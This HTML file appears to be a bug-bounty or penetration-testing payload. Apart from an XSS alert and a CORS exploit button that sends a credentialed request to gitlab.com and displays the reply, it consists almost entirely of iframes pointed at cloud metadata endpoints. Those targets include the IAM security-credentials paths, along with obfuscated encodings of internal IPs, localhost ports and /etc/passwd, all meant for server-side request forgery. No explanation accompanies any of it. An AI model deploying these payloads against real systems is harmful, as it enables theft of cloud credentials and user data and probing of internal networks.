<html>
<script>alert(document.domain)</script>
<iframe src=http://metadata.google.internal/</iframe>
<iframe src=https://gitlab.com/gitlab></iframe>
<iframe src=http://169.254.169.254/latest/user-data></iframe>
<iframe src=http://169.254.169.254/></iframe>
<iframe src=http://169.254.169.254/metadata/v1/maintenance/></iframe>
<iframe src=http://169.254.169.254/metadata/instance?api-version=2017-04-02></iframe>
<iframe src=http://169.254.169.254/metadata/v1/id></iframe>
<iframe src=http://169.254.169.254/metadata/v1.json></iframe>
<iframe src=http://169.254.169.254/metadata/v1/></iframe>
<iframe src=http://169.254.169.254/metadata/v1/id></iframe>
<iframe src=http://169.254.169.254/metadata/v1/user-data></iframe>
<iframe src=http://169.254.169.254/metadata/v1/hostname></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/ami-id></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/reservation-id></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/hostname></iframe>
<iframe src=http://169.254.169.254/latest/dynamic/instance-identity/document></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access></iframe>
<iframe src=http://169.254.169.254/latest/dynamic/instance-identity/document></iframe>
<iframe src=http://169.254.170.2/v2/credentials/></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/public-keys/></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy></iframe>
<iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance></iframe>
<iframe src=http://169.254.169.254></iframe>
<iframe src=http://169.254.169.254.nip.io/></iframe>
<iframe src=http://425.510.425.510/></iframe>
<iframe src=http://2852039166/></iframe>
<iframe src=http://7147006462/></iframe>
<iframe src=http://0xA9FEA9FE/></iframe>
<iframe src=http://0251.0376.0251.0376/></iframe>
<iframe src=http://0251.00376.000251.0000376/></iframe>
<iframe src=http://0x41414141A9FEA9FE/></iframe>
<iframe src=http://0xA9.0xFE.0xA9.0xFE/></iframe>
<iframe src=http://instance-data></iframe>
<iframe src=http://127.127.127.127/></iframe>
<iframe src=http://127.0.1.3/></iframe>
<iframe src=http://127.0.0.0/></iframe>
<iframe src=http://2130706433/></iframe>
<iframe src=http://3232235521/></iframe>
<iframe src=http://3232235777/></iframe>
<iframe src=http://2852039166/></iframe>
<iframe src=http://0177.0.0.1/></iframe>
<iframe src=http://o177.0.0.1/></iframe>
<iframe src=http://0o177.0.0.1/></iframe>
<iframe src=http://q177.0.0.1/></iframe>
<iframe src=http://[0:0:0:0:0:ffff:127.0.0.1]/></iframe>
<iframe src=http://0/></iframe>
<iframe src=http://127.1/></iframe>
<iframe src=http://127.0.1/></iframe>
<iframe src=///etc/passwd></iframe>
<iframe src=/etc/passwd></iframe>
<iframe src=etc/passwd></iframe>
<iframe src=/></iframe>
<iframe src=http://127.0.0.1:80></iframe>
<iframe src=http://127.0.0.1:443></iframe>
<iframe src=http://127.0.0.1:22></iframe>
<iframe src=http://0.0.0.0:80></iframe>
<iframe src=http://0.0.0.0:443></iframe>
<iframe src=http://0.0.0.0:22></iframe>
<iframe src=http://localhost:80></iframe>
<iframe src=http://localhost:443></iframe>
<iframe src=http://localhost:22></iframe>
<iframe src=https://localhost/></iframe>
<iframe src=https://127.0.0.1/></iframe>
<iframe src=http://[::]:80/></iframe>
<iframe src=http://[::]:25/></iframe>
<iframe src=http://[::]:22/></iframe>
<iframe src=http://[::]:3128/></iframe>
<iframe src=http://0000::1:80/></iframe>
<iframe src=http://0000::1:25/></iframe>
<iframe src=http://0000::1:22/></iframe>
<iframe src=http://0000::1:3128/></iframe>
<iframe src=http://spoofed.burpcollaborator.net></iframe>
<iframe src=http://localtest.me></iframe>
<iframe src=http://customer1.app.localhost.my.company.127.0.0.1.nip.io></iframe>
<iframe src=http://bugbounty.dod.network></iframe>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	 if (this.readyState == 4 && this.status == 200) {
	  document.getElementById("demo").innerHTML = alert(this.responseText);
	 }
	};
	xhttp.open("GET", "https://gitlab.com/gitlab", true);
	xhttp.withCredentials = true;
	xhttp.send();
}
</script>

    </html>
